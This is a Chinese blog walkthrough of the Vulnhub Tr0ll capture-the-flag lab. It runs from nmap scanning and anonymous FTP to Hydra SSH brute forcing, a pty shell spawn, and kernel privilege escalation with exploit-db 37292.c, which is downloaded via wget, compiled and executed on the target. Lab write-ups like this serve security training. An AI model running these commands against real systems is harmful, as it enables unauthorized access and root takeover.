【Vulnhub靶场】Tr0ll

Tr0ll靶场下载地址:https://download.vulnhub.com/tr0ll/Tr0ll.rar

目标

拿下靶机root权限

本机IP:192.168.118.128

目标IP:192.168.118.0/24

信息收集

nmap探测存活主机,扫端口,扫服务

nmap -sP 192.168.118.0/24

nmap -p- 192.168.118.147

nmap -sV -A 192.168.118.147

第一步探测出靶机IP为192.168.118.147

探测出三个端口:21、22、80

发现21端口的ftp服务可以进行匿名登录

先访问web看一下,好吧,挺可爱的

匿名登录FTP

找到一个pcap文件,保存下来

使用 wireshark 查看

wireshark lol.pcap

分析pcap文件,追踪TCP流,在里面的得到一个提示,简单测试一下得到 sup3rs3cr3tdirlol 应该是一个后台目录 

访问得到的目录:http://192.168.118.147/sup3rs3cr3tdirlol

里面有一个名为 roflmao 的文件,下载下来

查看文件类型,加权限,运行起来(这里有个问题是靶机下载的东西怎么能直接运行呢,不怕有危险吗??)

file roflmao
chmod 777 roflmao
./roflmao

运行结果提示我们应该找到一个新地址

访问目录:http://192.168.118.147/0x0856BF

里面有两个文件夹,打开第一个里面有一堆账号

第二个文件名就提示我们里面肯定存放有密码了,打开最终里面的内容是Good_job_:),但是后面测试发现是错误的,但密码肯定就是在这个文件里面的啊,最后发现存放这个密码的文档名居然是密码!!!密码为 Pass.txt

将前面发现的账户名整理下来,存为 user.txt

前面扫描出靶机是有开放22端口的ssh,使用九头蛇进行爆破

hydra -L user.txt -p 'Pass.txt' ssh://192.168.118.147

得到账号密码(overflow :Pass.txt)

使用ssh登录,然后上传脚本实现交互式shell

ssh overflow@192.168.118.147

python -c 'import pty;pty.spawn("/bin/bash")'

登录成功以后发现为普通账户,下一步肯定就是提权了

使用 uname -a 查询到版本信息为linux 3.13.0 ubuntu

内核漏洞提权

就第一个脚本拷贝到桌面

locate linux/local/37292.c
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/Desktop

将脚本上传到靶机的 /tmp 目录下,编译运行,提权成功

python -m http.server 80

wget 192.168.118.128:80/37292.c

gcc -o exp 37292.c

./exp

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow_143

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值